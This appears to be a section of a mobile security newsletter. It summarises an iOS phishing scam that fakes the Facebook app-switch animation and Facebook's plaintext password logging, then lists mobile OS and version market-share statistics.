New iOS phishing scam collecting Facebook credentials A new phishing scam has been discovered that fools users with a realistic-looking login flow. It starts on a cloned, fake web page of a well-known service (e.g. Airbnb). Once the user taps the 'Login with Facebook' button, the web page plays a video that imitates the app-switching animation of iOS. While the victim believes they are being redirected from the web page to the genuine Facebook app to sign in, a fake version of the Facebook login screen is in fact displayed inside the web page. Users with an eye for detail might notice that the original URL stays visible, minimized, throughout the process, revealing that they are still on the malicious website. According to Avast, however, many people could still be fooled because the animation looks authentic. Source: https://blog.avast.com/ios-phishing-scam-steals-facebook-logins

Facebook app’s logging passwords in plaintext A senior Facebook employee, who chose to remain anonymous, reported that hundreds of millions of Facebook passwords had been stored in plaintext. According to the employee, the plaintext passwords were accessible to thousands of Facebook employees over a period of several years. The problem originated in applications built by Facebook employees that logged unencrypted user data and stored it on internal company servers.

A few days later, Facebook confirmed the issue in a press post and stated that it had found no evidence that anyone internally accessed or abused the logged passwords. Facebook will nevertheless notify all affected users. Source: https://krebsonsecurity.com/2019/03/facebook-stored-hundreds-of-millions-of-user-passwords-in-plain-text-for-years/



6 Statistics

6.1 OS market shares

Android                                              69,63%
iOS                                                  28,50%
Unknown, Series 40 and Windows Phone OS (combined)    1,79%

Figure 9 - OS market share (Source)

If we compare this month's operating system market shares to last month's, we see a very small increase for Android. iOS, by contrast, decreased slightly compared to last month. All other OSs showed little fluctuation compared to last month.

6.2 iOS

iOS 12.X                                             81,67%
iOS 11.X                                             11,38%
iOS 10.X                                              3,13%
iOS 9.X, iOS 8.X, iOS 7.X and Other (combined)        3,85%

Figure 10 - Usage of iOS versions (Source)



As in the previous three months, iOS users continue to shift towards the newest iOS 12 versions, which is a good thing. Since the stable release of iOS 12 in mid-September 2018, more than three quarters of all iOS users have installed it. iOS 12.x gained 2,15 percentage points this month.

6.3 Android

Version        Codename             Distribution
Android        (unspecified)           3,90%
Android 1.0                            0,03%
Android 1.1    Petit Four              0,01%
Android 1.5    Cupcake                 0,07%
Android 1.6    Donut                   0,14%
Android 2.0    Eclair                  0,04%
Android 2.1    Eclair                  0,06%
Android 2.2    Froyo                   1,12%
Android 2.3    Gingerbread             0,07%
Android 4.0    Ice Cream Sandwich      1,36%
Android 4.1    Jelly Bean              0,62%
Android 4.2    Jelly Bean              2,39%
Android 4.3    Jelly Bean              0,18%
Android 4.4    KitKat                  2,67%
Android 5.0    Lollipop                1,74%
Android 5.1    Lollipop                7,03%
Android 6.0    Marshmallow            13,46%
Android 6.1                            0,05%
Android 7.0    Nougat                 11,90%
Android 7.1    Nougat                  9,07%
Android 8.0    Oreo                   21,67%
Android 8.1    Oreo                   22,71%
Android 9.0    Pie                     0,73%
Android 9.1                            0,00%

(Source)

As Google has stopped publishing updates to its version dashboard, the data listed above is taken from NetMarketShare, an online service that provides web usage share statistics based on real users and is trusted by many reputable vendors. NetMarketShare collects its data from approximately 100 million valid sessions per month across over a thousand different websites. The service applies bot/fraud detection and country-level weighting and removes hidden pages from the data to obtain accurate statistics. If we compare these statistics with Google's last dashboard, the adoption of Android Oreo appears to have doubled since Google's last assessment, while the usage of all other versions has decreased, which is a good thing. The newest version, Android Pie, has now appeared in the data, so we can expect a slow rise in its adoption over the coming months.

(End of document)
